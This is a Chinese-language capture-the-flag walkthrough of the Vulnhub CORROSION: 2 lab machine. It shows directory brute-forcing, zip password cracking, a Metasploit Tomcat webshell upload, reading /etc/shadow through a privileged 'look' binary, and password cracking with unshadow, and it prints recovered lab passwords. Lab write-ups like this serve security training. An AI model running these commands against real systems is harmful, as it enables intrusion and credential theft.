title: 'Vulnhub-CORROSION: 2'
tags: Vulnhub
abbrlink: cb0f1354

date: 2022-12-04 09:38:51

描述

Difficulty: Medium

Hint: Enumeration is key.


存活

image-20221204095932968

kali  192.168.169.220
靶机   192.168.169.230

靶机

image-20221204100203706

端口 22 80 8080

80

image-20221204100349216

8080

image-20221204100408871

目录爆破

gobuster dir -u http://192.168.169.230/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

image-20221204101143874

http://192.168.169.230/   80端口的没跑出来
  • 试一下8080
gobuster dir -u http://192.168.169.230:8080/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

image-20221204101455728

两个文件

readme

image-20221204101537044

Hey randy! It's your System Administrator. I left you a file on the server, I'm sure nobody will find it.
Also remember to use that password I gave you.

嘿,Randy! 我是你的系统管理员。我在服务器上给你留了一个文件,我相信没有人会发现它。
另外,记得使用我给你的密码。

backup

  • 上面提示的应该是这个文件

image-20221204101808596

  • 爆破压缩包
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

image-20221204101903261

image-20221204101958349

  • tomcat-users

image-20221204102118957

manager /melehifokivai
admin  /melehifokivai
```
这两都是可以登陆的,那账号密码没问题,找到了上传的地方,但试了下没啥反应.
msf 有个 Tomcat 上传webshell的模块,有用户名和密码就可以使用:

漏洞利用

  • msf
msfconsole
  • 搜索漏洞
search tomcat upload

image-20221204102925524

  • 使用
use 3

image-20221204103327056

  • 设置

image-20221204103925820

  • 检查一下

image-20221204104024108

个人失误 : 靶机IP 192.168.169.230
  • 开始攻击
run

image-20221204104411014

image-20221204104440949

查看文件

image-20221204105031236

  • 因为 randy 下的文件不能修改,一些关键文件也无法查看,而/home/jaye 文件夹里的文件没有权限查看:

  • 尝试一下切换成 jaye 用户,密码还是用刚才发现的 Tomcat 密码:

image-20221204105154606

image-20221204105440309

image-20221204105531352

  • 可以ssh

    image-20221204105917001

这里再jaye的目录下发现了look文件,查看一番后,发现他是系统的文件,这里可以进行越权访问,然后cat命令这里是用不了的,看了大佬们的提示,这里需要用到LFILE,该命令等同于file_to_read。读取一下shadow和passwd的文件内容
```
LFILE=/etc/shadow

./look '' "$LFILE"

image-20221204110502985

  • 读取passwd和shadow的文件

image-20221204111307215

passwd下载
  • 再使用unshadow命令将这两个文件生成需要破解的文件。
unshadow passwd shadow > password.txt

image-20221204112120117

  • 破解 -看帖子说要好久

image-20221204112249003

借用大佬的

melehifokivai (jaye)
07051986randy (randy)
  • ssh连接

image-20221204112919854

提权

image-20221204112600686

  • 跟着大佬操作

image-20221204113338797

image-20221204113606139

image-20221204115906333

image-20221204115636047